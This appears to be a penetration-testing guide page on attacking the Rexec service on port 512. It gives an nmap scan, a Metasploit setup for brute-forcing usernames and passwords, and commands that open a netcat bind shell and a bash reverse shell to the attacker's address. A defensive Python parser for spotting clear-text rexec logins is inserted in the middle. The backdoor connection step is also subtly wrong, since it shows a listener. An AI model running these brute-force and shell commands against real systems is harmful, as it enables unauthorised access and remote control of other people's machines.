Rexec - Port 512
It is a service that allows you to execute a command inside a host if you know valid credentials (username and password).
Basic Info
Default Port: 512
PORT STATE SERVICE
512/tcp open exec
Scanning for Hosts
Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec:
nmap -sT -p 512 <target_ip_range>
This will help identify potential targets with the Rexec service running.
Brute-Forcing Credentials
Use Metasploit's auxiliary/scanner/rservices/rexec_login module to brute-force username and password combinations:
Load the module:
use auxiliary/scanner/rservices/rexec_login
Set the target and options, such as username and password files:
set RHOSTS <target_ip>
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
run
This will attempt to find valid credentials, exploiting Rexec's clear-text password vulnerability.
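As an added example (not code from the original page), the following Python parser shows what the clear-text weakness looks like on the wire and how a network sensor could flag rexec sessions on TCP/512. The flow records and payloads are constructed, and the finding deliberately omits the password itself so it can be logged safely.

```python
# Added example, not from the original page: detect rexec requests on TCP/512
# and flag the clear-text credentials they carry. Wire format per rexecd(8):
#   "<stderr_port>\0<username>\0<password>\0<command>\0"
# Flow records and payloads below are constructed for illustration.

from typing import Optional

MAX_FIELD = 16  # rexecd limits username and password to 16 characters


def parse_rexec_request(payload: bytes) -> Optional[dict]:
    """Return a finding for a well-formed rexec request, else None.

    The password is never returned, only the fact that it travelled in
    clear text, so the finding can go straight into a SIEM.
    """
    parts = payload.split(b"\0")
    # Four NUL-terminated fields leave a fifth (possibly empty) trailing chunk.
    if len(parts) < 5:
        return None
    port_s, user, password, command = parts[:4]
    if not port_s.isdigit():
        return None  # first field must be an ASCII base-10 port number
    stderr_port = int(port_s)
    if stderr_port > 65535 or len(user) > MAX_FIELD or len(password) > MAX_FIELD:
        return None
    return {
        "stderr_port": stderr_port,
        "username": user.decode(errors="replace"),
        "password_in_clear": len(password) > 0,
        "command": command.decode(errors="replace"),
        "severity": "high",  # clear-text auth plus remote command execution
    }


def scan_flows(flows):
    """Yield findings for flows to dst port 512 whose payload parses as rexec."""
    for flow in flows:
        if flow["dst_port"] != 512:
            continue
        finding = parse_rexec_request(flow["payload"])
        if finding:
            yield {"src": flow["src"], **finding}


# Constructed sample flows: one rexec request and one unrelated connection.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst_port": 512, "payload": b"0\0alice\0s3cret\0id\0"},
    {"src": "10.0.0.6", "dst_port": 512, "payload": b"GET / HTTP/1.0\r\n\r\n"},
]

if __name__ == "__main__":
    for f in scan_flows(SAMPLE_FLOWS):
        print(f)
```

The same check can be pointed at a packet capture by feeding it the first client payload of each connection to port 512.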
Exploiting with Command Execution
Once credentials are obtained, use the rexec command to execute a backdoor command. For example, start a netcat listener:
rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"
Then, connect to the backdoor:
nc -lnvp 1234
Alternatively, set up a reverse shell:
rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"